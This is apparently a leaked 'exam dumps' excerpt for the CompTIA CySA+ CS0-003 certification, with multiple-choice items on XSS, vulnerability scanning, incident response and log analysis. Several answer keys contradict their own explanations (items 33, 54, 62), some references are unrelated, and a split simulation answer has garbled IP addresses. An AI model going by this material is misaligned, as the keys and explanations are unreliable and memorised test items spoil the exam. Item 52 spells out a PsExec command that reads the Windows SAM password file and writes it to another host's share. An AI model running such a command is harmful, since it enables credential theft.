A. Increases the product price by using the implementation as a piece of marketing
B. Decreases the risks of the software usage and complies with regulatory requirements
C. Improves the agile process and decreases the amount of tests before the final deployment
D. Transfers the responsibility for security flaws to the vulnerability management team
Answer: B
Explanation:
A Secure Software Development Life Cycle (SDLC) integrates security measures at each stage of
development to reduce vulnerabilities and improve the overall security of the software. This is
essential for minimizing risks related to software usage and ensuring compliance with regulatory
requirements, which is particularly important for organizations handling sensitive data. As per
CompTIA standards, a Secure SDLC helps prevent security breaches and protects both the
organization and its users from potential harm. Options A, C, and D do not accurately describe the
primary goals of a Secure SDLC, which primarily centers on risk reduction and regulatory compliance.

33.A security analyst recently used Arachni to perform a vulnerability assessment of a newly
developed web application.
The analyst is concerned about the following output:
[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx
[-] XSS: Analyzing response #1...
[-] XSS: Analyzing response #2...
[-] XSS: Analyzing response #3...
[+] XSS: Response is tainted. Looking for proof of the vulnerability.
Which of the following is the most likely reason for this vulnerability?
A. The developer set input validation protection on the specific field of search.aspx.
B. The developer did not set proper cross-site scripting protections in the header.
C. The developer did not implement default protections in the web application build.
D. The developer did not set proper cross-site request forgery protections.
Answer: A
Explanation:
The most likely reason for this vulnerability is B. The developer did not set proper cross-site scripting
protections in the header. Cross-site scripting (XSS) is a type of web application vulnerability that
allows an attacker to inject malicious code into a web page that is viewed by other users. XSS can be
used to steal cookies, session tokens, credentials, or other sensitive information, or to perform actions
on behalf of the victim1.
One of the common ways to prevent XSS attacks is to set proper HTTP response headers that
instruct the browser how to handle the content of the web page. For example, the Content-Type
header can specify the MIME type and character encoding of the web page, which can help the
browser avoid interpreting data as code. The X-XSS-Protection header can enable or disable the
browser’s built-in XSS filter, which can block or sanitize suspicious scripts. The Content-Security-
Policy header can define a whitelist of sources and directives that control what resources and scripts
can be loaded or executed on the web page2.
According to the output of Arachni, a web application security scanner framework3, it detected an
XSS vulnerability in the form input ‘txtSearch’ with action https://localhost/search.aspx. This means
that Arachni was able to inject a malicious script into the input field and observe its execution in the
response. This indicates that the developer did not set proper cross-site scripting protections in the
header of search.aspx, which allowed Arachni to bypass the browser’s default security mechanisms
and execute arbitrary code on the web page.

34.A SOC manager is establishing a reporting process to manage vulnerabilities.

Which of the following would be the best solution to identify potential loss incurred by an issue?
A. Trends
B. Risk score
C. Mitigation
D. Prioritization
Answer: B
Explanation:
A risk score is a numerical value that represents the potential impact and likelihood of a vulnerability
being exploited. It can help to identify the potential loss incurred by an issue and prioritize remediation
efforts accordingly. https://www.comptia.org/training/books/cysa-cs0-003-study-guide
35. A company is launching a new application in its internal network, where internal customers can
communicate with the service desk. The security team needs to ensure the application will be able to
handle unexpected strings with anomalous formats without crashing.
Which of the following processes is the most applicable for testing the application to find how it would
behave in such a situation?
A. Fuzzing
B. Coding review
C. Debugging
D. Static analysis
Answer: A
Explanation:
Fuzzing is a process used to test applications by inputting unexpected or random data to see how the
application behaves. This method is particularly effective in identifying vulnerabilities such as buffer
overflows, input validation errors, and other anomalies that could cause the application to crash or
behave unexpectedly. By using fuzzing, the security team can ensure the new application is robust
and capable of handling unexpected strings with anomalous formats without crashing.

36.11 1. 16.37 repeatedly accessed /about_us.html with 404 errors, indicating attempts to reach non-
existing pages.
4 1. 2 1. 18.102 accessed the 200 status code, showing successful page requests, but since this IP
was modifying files directly on the server, it might be testing or verifying changes.
Again, 4 1. 2 1. 18.102 stands out as it matches both successful file modification and page request
patterns, while 32.11 1. 16.37 shows unsuccessful attempts.
Step 4: Selecting the IP of Concern
Based on the above analysis:
4 1. 2 1. 18.102 should be the IP of concern due to its direct file modifications on critical web files
(about_us.html, index.html).
Step 5: Identifying the Indicator of Compromise
Potential indicators include unauthorized file modifications:
Modified index.html file is the correct answer, as it indicates direct changes to website content and is
often a clear sign of compromise.
Step 6: Selecting Corrective Actions
To mitigate and prevent further compromise:
Change the password on the “sjames” account: The account was used across various IPs, indicating
potential account compromise.
Block external SFTP access: Restricting SFTP to internal IPs only would prevent unauthorized
external modifications. Since 4 1. 2 1. 18.102 was external, this would stop similar threats.
Summary IP of Concern: 4 1. 2 1. 18.102
Indicator of Compromise: Modified index.html file
Corrective Actions:
Change the password on the sjames account
Block external SFTP access
These selections address both the immediate security breach and implement a preventative measure
against future unauthorized access.
37. Which of the following best describes the key goal of the containment stage of an incident
response process?
A. To limit further damage from occurring
B. To get services back up and running
C. To communicate goals and objectives of the incident response plan
D. To prevent data follow-on actions by adversary exfiltration
Answer: A
Explanation:
The key goal of the containment stage in an incident response process is to limit further damage from
occurring. This involves taking immediate steps to isolate the affected systems or network segments
to prevent the spread of the incident and mitigate its impact. Containment strategies can be short-
term, to quickly stop the incident, or long-term, to prepare for the eradication and recovery phases.

38.Which of the following is a reason why proper handling and reporting of existing evidence are
important for the investigation and reporting phases of an incident response?
A. TO ensure the report is legally acceptable in case it needs to be presented in court
B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis
Answer: A
Explanation:
The correct answer is A) To ensure the report is legally acceptable in case it needs to be presented in
court.
Proper handling and reporting of existing evidence are important for the investigation and reporting
phases of an incident response because they ensure the integrity, authenticity, and admissibility of
the evidence in case it needs to be presented in court. Evidence that is mishandled, tampered with, or
poorly documented may not be accepted by the court or may be challenged by the opposing party.
Therefore, incident responders should follow the best practices and standards for evidence collection,
preservation, analysis, and reporting1.
The other options are not reasons why proper handling and reporting of existing evidence are
important for the investigation and reporting phases of an incident response. They are rather
outcomes or benefits of conducting a thorough and effective incident response process. A lessons-
learned analysis (B) is a way to identify the strengths and weaknesses of the incident response team
and improve their performance for future incidents. A postmortem analysis © is a way to determine
the root cause, impact, and timeline of the incident and provide recommendations for remediation and
prevention. A root cause analysis (D) is a way to identify the underlying factors that led to the incident
and address them accordingly.

39.A company's threat team has been reviewing recent security incidents and looking for a common
theme. The team discovered the incidents were caused by incorrect configurations on the impacted
systems. The issues were reported to support teams, but no action was taken.
Which of the following is the next step the company should take to ensure any future issues are
remediated?
A. Require support teams to develop a corrective control that ensures security failures are addressed
once they are identified.
B. Require support teams to develop a preventive control that ensures new systems are built with the
required security configurations.
C. Require support teams to develop a detective control that ensures they continuously assess
systems for configuration errors.
D. Require support teams to develop a managerial control that ensures systems have a documented
configuration baseline.
Answer: A
Explanation:
Requiring support teams to develop a corrective control that ensures security failures are addressed
once they are identified is the best step to prevent future issues from being remediated. Corrective
controls are actions or mechanisms that are implemented after a security incident or failure has
occurred to fix or restore the normal state of the system or network. Corrective controls can include
patching, updating, repairing, restoring, or reconfiguring systems or components that were affected by
the incident or failure.
Reference: https://www.techopedia.com/definition/10339/memory-dump

40.During security scanning, a security analyst regularly finds the same vulnerabilities in a critical
application.
Which of the following recommendations would best mitigate this problem if applied along the SDLC
phase?
A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CDflow
D. Implement proper input validation for any data entry form
Answer: C
Explanation:
Application security scanning is a process that involves testing and analyzing applications for security
vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure
configuration. Application security scanning can help identify and fix security issues before they
become exploitable by attackers. Using application security scanning as part of the pipeline for the
continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the
same vulnerabilities in a critical application during security scanning. This is because application
security scanning can be integrated into the development lifecycle and performed automatically and
frequently as part of the CI/CD process.

41.A security alert was triggered when an end user tried to access a website that is not allowed per
organizational policy. Since the action is considered a terminable offense, the SOC analyst collects
the authentication logs, web logs, and temporary files, reflecting the web searches from the user's
workstation, to build the case for the investigation.
Which of the following is the best way to ensure that the investigation complies with HR or privacy
policies?
A. Create a timeline of events detailinq the date stamps, user account hostname and IP information
associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the
evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access
will not be able to easily identity the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Answer: B
Explanation:
The best way to ensure that the investigation complies with HR or privacy policies is to ensure that
the case details do not reflect any user-identifiable information, such as name, email address, phone
number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent
any potential discrimination or retaliation. Additionally, password protecting the evidence and
restricting access to personnel related to the investigation can help preserve the integrity and security
of the evidence and prevent any unauthorized or accidental disclosure or modification.

42.A company recently removed administrator rights from all of its end user workstations. An analyst
uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces
the following information:
Which of the following vulnerabilities should be prioritized for remediation?
A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills
Answer: D
Explanation:
Based on the CVSSv3.1 exploitability metrics provided and the fact that administrator rights have
been removed from all end-user workstations, the vulnerability to prioritize for remediation is: D.
great.skills.
This vulnerability can be exploited remotely (AV:N), has low attack complexity (AC:L), requires no
privileges (PR:N), and no user interaction (UI:N), making it the most accessible and dangerous of the
listed vulnerabilities.
43. A regulated organization experienced a security breach that exposed a list of customer names
with corresponding PH data.
Which of the following is the best reason for developing the organization's communication plans?
A. For the organization's public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur
Answer: B
Explanation:
Developing an organization's communication plans is crucial to ensure that incidents, especially those
involving sensitive data like PH (Protected Health) data, are promptly reported to the relevant
regulatory agencies. This is essential for compliance with legal and regulatory requirements, which
often mandate timely notification of data breaches. Effective communication plans help the
organization manage the breach response process, mitigate potential legal penalties, and maintain
transparency with regulatory bodies.

44.AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of

a company. The security department confirmed the finding and needs to provide a recommendation
to the application owner.
Which of the following recommendations will best prevent this vulnerability from being exploited?
(Select two).
A. Implement an IPS in front of the web server.
B. Enable MFA on the website.
C. Take the website offline until it is patched.
D. Implement a compensating control in the source code.
E. Configure TLS v1.3 on the website.
F. Fix the vulnerability using a virtual patch at the WAF.
Answer: DF
Explanation:
The best recommendations to prevent an XSS vulnerability from being exploited are to implement a
compensating control in the source code and to fix the vulnerability using a virtual patch at the WAF.
A compensating control is a technique that mitigates the risk of a vulnerability by adding additional
security measures, such as input validation, output encoding, or HTML sanitization. A virtual patch is
a rule that blocks or modifies malicious requests or responses at the WAF level, without modifying the
application code. These recommendations are effective, efficient, and less disruptive than the other
options.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security
Operations and Monitoring, page 156; Cross Site Scripting Prevention Cheat Sheet, Section: XSS
Defense Philosophy.

45.Which of the following techniques can help a SOC team to reduce the number of alerts related to
the internal security activities that the analysts have to triage?
A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.
Answer: D
Explanation:
Adding a SOAR rule can help to automate the process of filtering out the noise, which in turn reduces
the number of alerts that analysts have to deal with. This includes getting rid of redundant alerts and
those that are irrelevant to the security posture.

46.Which of the following is the most important reason for an incident response team to develop a
formal incident declaration?
A. To require that an incident be reported through the proper channels
B. To identify and document staff who have the authority to declare an incident
C. To allow for public disclosure of a security event impacting the organization
D. To establish the department that is responsible for responding to an incident
Answer: B
Explanation:
The formal incident declaration is crucial to identify and document the staff who have the authority to
declare an incident, ensuring that incidents are handled by authorized personnel.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5: Incident
Response, page 197.

47. SIMULATION
An organization's website was maliciously altered.

INSTRUCTIONS
Review information in each tab to select the source IP the analyst should be concerned about, the
indicator of compromise, and the two appropriate corrective actions.
Answer:
Step 1: Analyzing the SFTP Log
The SFTP log provides a record of file transfer and login activities:
User “sjames” logged in from several IP addresses:

48.A security analyst has prepared a vulnerability scan that contains all of the company's functional
subnets. During the initial scan, users reported that network printers began to print pages that
contained unreadable text and icons.
Which of the following should the analyst do to ensure this behavior does not oocur during
subsequent vulnerability scans?
A. Perform non-credentialed scans.
B. Ignore embedded web server ports.
C. Create a tailored scan for the printer subnet.
D. Increase the threshold length of the scan timeout.
Answer: C
Explanation:
The best way to prevent network printers from printing pages during a vulnerability scan is to create a
tailored scan for the printer subnet that excludes the ports and services that trigger the printing
behavior. The other options are not effective for this purpose: performing non-credentialed scans may
not reduce the impact on the printers; ignoring embedded web server ports may not cover all the
possible ports that cause printing; increasing the threshold length of the scan timeout may not prevent
the printing from occurring.
Reference: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the
objectives for the exam is to “use appropriate tools and methods to manage, prioritize and respond to
attacks and vulnerabilities”. The book also covers the usage and syntax of vulnerability scanning
tools, such as Nessus, Nmap, and Qualys, in chapter 4. Specifically, it explains the meaning and
function of each component in vulnerability scanning, such as credentialed vs. non-credentialed
scans, port scanning, and scan scheduling1, pages 149-160. It also discusses the common issues
and challenges of vulnerability scanning, such as network disruptions, false positives, and scan
scope1, pages 161-162. Therefore, this is a reliable source to verify the answer to the question.

49.A security analyst responds to a series of events surrounding sporadic bandwidth consumption
from an endpoint device.
The security analyst then identifies the following additional details:
• Bursts of network utilization occur approximately every seven days.
• The content being transferred appears to be encrypted or obfuscated.
• A separate but persistent outbound TCP connection from the host to infrastructure in a third-party
cloud is in place.
• The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
• Single file sizes are 10GB.
Which of the following describes the most likely cause of the issue?
A. Memory consumption
B. Non-standard port usage
C. Data exfiltration
D. System update
E. Botnet participant
Answer: C
Explanation:
data exfiltration is the unauthorized transfer of data from an organization’s network to an external
destination, usually for malicious purposes such as espionage, sabotage, or theft. The details given in
the question suggest that data exfiltration is occurring from an endpoint device. The bursts of network
utilization every seven days indicate periodic data transfers. The content being transferred appears to
be encrypted or obfuscated to avoid detection or analysis. The persistent outbound TCP connection
from the host to infrastructure in a third-party cloud indicates a possible command and control
channel for an attacker. The HDD utilization on the device grows by 10GB to 12GB over the course of
every seven days, and single file sizes are 10GB, indicating that large amounts of data are being
collected and compressed before being exfiltrated.

50.An organization supports a large number of remote users.

Which of the following is the best option to protect the data on the remote users' laptops?
A. Require the use of VPNs.
B. Require employees to sign an NDA.
C. Implement a DLP solution.
D. Use whole disk encryption.
Answer: D
Explanation:
Using whole disk encryption is the best option to protect the data on the remote users’ laptops.
Whole disk encryption is a technique that encrypts all data on a hard disk drive, including the
operating system, applications and files. Whole disk encryption can prevent unauthorized access to
the data if the laptop is lost, stolen or compromised. Whole disk encryption can also protect the data
from physical attacks, such as removing the hard disk and connecting it to another device.
Reference: https://www.techopedia.com/definition/10339/memory-dump

51.A security team conducts a lessons-learned meeting after struggling to determine who should
conduct the next steps following a security event.
Which of the following should the team create to address this issue?
A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding
Answer: C
Explanation:
An incident response plan (IRP) is a document that defines the roles and responsibilities, procedures,
and guidelines for responding to a security incident. It helps the security team to act quickly and
effectively, minimizing the impact and cost of the incident. An IRP should specify who should conduct
the next steps following a security event, such as containment, eradication, recovery, and analysis12.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, page 362; 6 Incident Response
Steps to Take After a Security Event, section 2.

52.While reviewing system logs, a network administrator discovers the following entry:

Which of the following occurred?

A. An attempt was made to access a remote workstation.
B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.
Answer: D
Explanation:
The output shows an entry from a system log that indicates a user was trying to download a password
file from a remote system using PsExec. PsExec is a command-line tool that allows users to execute
processes on remote systems. The entry shows that the user “administrator” tried to run PsExec with
the following parameters: \192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c type
c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt This means that the user tried to
connect to the remote system with IP address 192.168.1.100 using the username “administrator” and
password “P@ssw0rd”, copy cmd.exe to the remote system, and execute it with the command “type
c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt”. This command attempts to
read the SAM file, which contains hashed passwords of local users, and write it to a file on another
system with IP address 192.168.1.101.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
8; https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

53.The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used m the attempt
B. The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Answer: D
Explanation:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a
web page that is then executed by the browser of a victim user. A reflected XSS attack is a type of
XSS attack where the malicious code is embedded in a URL or a form parameter that is sent to the
web server and then reflected back to the user’s browser. In this case, the Nmap scan shows that the
web server is vulnerable to a reflected XSS attack, as it returns the characters > and " without any
filtering or encoding. The vulnerable parameter is id in the URL http://172.31.15.2/1.php?id=2.

54.An analyst is conducting monitoring against an authorized team that win perform adversarial
techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be
used.
Which of the following teams is the analyst a member of?
A. Orange team
B. Blue team
C. Red team
D. Purple team
Answer: B
Explanation:
The correct answer is
A. Orange team.
An orange team is a team that is involved in facilitation and training of other teams in cybersecurity.
An orange team assists the yellow team, which is the management or leadership team that oversees
the cybersecurity strategy and governance of an organization. An orange team helps the yellow team
to understand the cybersecurity risks and challenges, as well as the roles and responsibilities of other
teams, such as the red, blue, and purple teams12.
In this scenario, the analyst is conducting monitoring against an authorized team that will perform
adversarial techniques. This means that the analyst is observing and evaluating the performance of
another team that is simulating real-world attacks against the organization’s systems or networks.
This could be either a red team or a purple team, depending on whether they are working
independently or collaboratively with the defensive team345.
The analyst interacts with the team twice per day to set the stage for the techniques to be used. This
means that the analyst is providing guidance and feedback to the team on how to conduct their
testing and what techniques to use. This could also involve setting up scenarios, objectives, rules of
engagement, and success criteria for the testing. This implies that the analyst is facilitating and
training the team to improve their skills and capabilities in cybersecurity12.
Therefore, based on these descriptions, the analyst is a member of an orange team, which is involved
in facilitation and training of other teams in cybersecurity.
The other options are incorrect because they do not match the role and function of the analyst in this
scenario.
Option B is incorrect because a blue team is a defensive security team that monitors and protects the
organization’s systems and networks from real or simulated attacks. A blue team does not conduct
monitoring against an authorized team that will perform adversarial techniques, but rather defends
against them345.
Option C is incorrect because a red team is an offensive security team that discovers and exploits
vulnerabilities in the organization’s systems or networks by simulating real-world attacks. A red team
does not conduct monitoring against an authorized team that will perform adversarial techniques, but
rather performs them345.
Option D is incorrect because a purple team is not a separate security team, but rather a collaborative
approach between the red and blue teams to improve the organization’s overall security. A purple
team does not conduct monitoring against an authorized team that will perform adversarial
techniques, but rather works with them345.
Reference: 1 Infosec Color Wheel & The Difference Between Red & Blue Teams
2 The colors of cybersecurity - UWCMadison ? Information Technology
3 Red Team vs. Blue Team vs. Purple Team Compared - U.S. Cybersecurity
4 Red Team vs. Blue Team vs. Purple Team: What’s The Difference? | Varonis
5 Red, blue, and purple teams: Cybersecurity roles explained | Pluralsight Blog

55.An analyst is examining events in multiple systems but is having difficulty correlating data points.
Which of the following is most likely the issue with the system?
A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook
Answer: C
Explanation:
Time synchronization is the process of ensuring that all systems in a network have the same accurate
time, which is essential for correlating data points from different sources. If the system has an issue
with time synchronization, the analyst may have difficulty matching events that occurred at the same
time or in a specific order. Access rights, network segmentation, and invalid playbook are not directly
related to the issue of correlating data points.
Verified
Reference: [CompTIA CySA+ CS0-002 Certification Study Guide], page 23

56.A penetration tester is conducting a test on an organization's software development website.

The penetration tester sends the following request to the web interface:
Which of the following exploits is most likely being attempted?
A. SQL injection
B. Local file inclusion
C. Cross-site scripting
D. Directory traversal
Answer: A
Explanation:
SQL injection is a type of attack that injects malicious SQL statements into a web application’s input
fields or parameters, in order to manipulate or access the underlying database. The request shown in
the image contains an SQL injection attempt, as indicated by the “UNION SELECT” statement, which
is used to combine the results of two or more queries. The attacker is trying to extract information
from the database by appending the malicious query to the original one

57.A security analyst is trying to identify anomalies on the network routing.

Which of the following functions can the analyst use on a shell script to achieve the objective most
accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1}
').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }
Answer: C
Explanation:
The function that can be used on a shell script to identify anomalies on the network routing most
accurately is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1}
').origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
This function takes an IP address as an argument and performs two DNS lookups using the dig
command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname
associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the
autonomous system number (ASN) and other information related to the IP address. The function then
prints the IP address and the ASN information, which can help identify any routing anomalies or
inconsistencies

58.An incident response team receives an alert to start an investigation of an internet outage. The
outage is preventing all users in multiple locations from accessing external SaaS resources. The team
determines the organization was impacted by a DDoS attack.
Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Answer: C
Explanation:
A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a
target’s network or server with a large volume of traffic from multiple sources. A common technique
for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving
domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can
disrupt the normal functioning of the internet and prevent users from accessing external SaaS
resources.
Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-
seven-steps-cyberattack/

59.Which of the following most accurately describes the Cyber Kill Chain methodology?
A. It is used to correlate events to ascertain the TTPs of an attacker.
B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
C. It provides a clear model of how an attacker generally operates during an intrusion and the actions
to take at each stage
D. It outlines a clear path for determining the relationships between the attacker, the technology used,
and the target
Answer: C
Explanation:
The Cyber Kill Chain methodology provides a clear model of how an attacker generally operates
during an intrusion and the actions to take at each stage. It is divided into seven stages:
reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions
on objectives. It helps network defenders understand and prevent cyberattacks by identifying the
attacker’s objectives and tactics.
Reference: The Cyber Kill Chain: The Seven Steps of a Cyberattack

60.Which of the following entities should an incident manager work with to ensure correct processes
are adhered to when communicating incident reporting to the general public, as a best practice?
(Select two).
A. Law enforcement
B. Governance
C. Legal
D. Manager
E. Public relations
F. Human resources
Answer: CE
Explanation:
An incident manager should work with the legal and public relations entities to ensure correct
processes are adhered to when communicating incident reporting to the general public, as a best
practice. The legal entity can provide guidance on the legal implications and obligations of disclosing
the incident, such as compliance with data protection laws, contractual obligations, and liability
issues. The public relations entity can help craft the appropriate message and tone for the public
communication, as well as manage the reputation and image of the organization in the aftermath of
the incident. These two entities can help the incident manager balance the need for transparency and
accountability with the need for confidentiality and security12.
Reference: Incident Communication Templates, Incident Management: Processes, Best Practices &
Tools - Atlassian

61.A systems administrator notices unfamiliar directory names on a production server. The
administrator reviews the directory listings and files, and then concludes the server has been
compromised.
Which of the following steps should the administrator take next?
A. Inform the internal incident response team.
B. Follow the company's incident response plan.
C. Review the lessons learned for the best approach.
D. Determine when the access started.
Answer: B
Explanation:
An incident response plan is a set of predefined procedures and guidelines that an organization
follows when faced with a security breach or attack. An incident response plan helps to ensure that
the organization can quickly and effectively contain, analyze, eradicate, and recover from the incident,
as well as prevent or minimize the damage and impact to the business operations, reputation, and
customers. An incident response plan also defines the roles and responsibilities of the incident
response team, the communication channels and protocols, the escalation and reporting procedures,
and the tools and resources available for the incident response.
By following the company’s incident response plan, the administrator can ensure that they are
following the best practices and standards for handling a security incident, and that they are
coordinating and collaborating with the relevant stakeholders and authorities. Following the
company’s incident response plan can also help to avoid or reduce any legal, regulatory, or
contractual liabilities or penalties that may arise from the incident.
The other options are not as effective or appropriate as following the company’s incident response
plan. Informing the internal incident response team (A) is a good step, but it should be done according
to the company’s incident response plan, which may specify who, when, how, and what to report.
Reviewing the lessons learned for the best approach © is a good step, but it should be done after the
incident has been resolved and closed, not during the active response phase. Determining when the
access started (D) is a good step, but it should be done as part of the analysis phase of the incident
response plan, not before following the plan.

62.A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply
to the company. The CISO has tasked a security analyst with finding the proper control functions to
verify that a user's data is not altered without the user's consent.
Which of the following would be an appropriate course of action?
A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized
changes.
Answer: C
Explanation:
Automating the use of a hashing algorithm after verified users make changes to their data is an
appropriate course of action to verify that a user’s data is not altered without the user’s consent.
Hashing is a technique that produces a unique and fixed-length value for a given input, such as a file
or a message. Hashing can help to verify the data integrity by comparing the hash values of the
original and modified data. If the hash values match, then the data has not been altered without the
user’s consent. If the hash values differ, then the data may have been tampered with or corrupted.

63.A security analyst is logged on to a jump server to audit the system configuration and status.
The organization's policies for access to and configuration of the jump server include the following:
• No network access is allowed to the internet.
• SSH is only for management of the server.
• Users must utilize their own accounts, with no direct login as an administrator.
• Unnecessary services must be disabled.
The analyst runs netstar with elevated permissions and receives the following output:

Which of the following policies does the server violate?

A. Unnecessary services must be disabled.
B. SSH is only for management of the server.
C. No network access is allowed to the internet.
D. Users must utilize their own accounts, with no direct login as an administrator.
Answer: C
Explanation:
The server violates the policy of no network access to the internet because it has an established
connection to an external IP address (216.58.194.174) on port 443, which is used for HTTPS traffic.
This indicates that the server is communicating with a web server on the internet, which is not allowed
by the policy. The other policies are not violated because SSH is only used for management of the
server (not for accessing other devices), users are utilizing their own accounts (not logging in as an
administrator), and unnecessary services are not enabled (only SSH and HTTPS are running).
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
9; https://en.wikipedia.org/wiki/Jump_server

64.Which of the following stakeholders are most likely to receive a vulnerability scan report? (Select
two).
 A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems admininstration
Answer: EF
Explanation:
The stakeholders most likely to receive a vulnerability scan report are:
The product owner needs to understand the security posture of the product to make informed
decisions about risk management, mitigation strategies, and prioritizing development resources.
Systems administrators are responsible for maintaining and securing systems. They need the details
from vulnerability scan reports to patch and remediate identified vulnerabilities in the systems they
manage.

Get CS0-003 exam dumps full version.

Powered by TCPDF (www.tcpdf.org)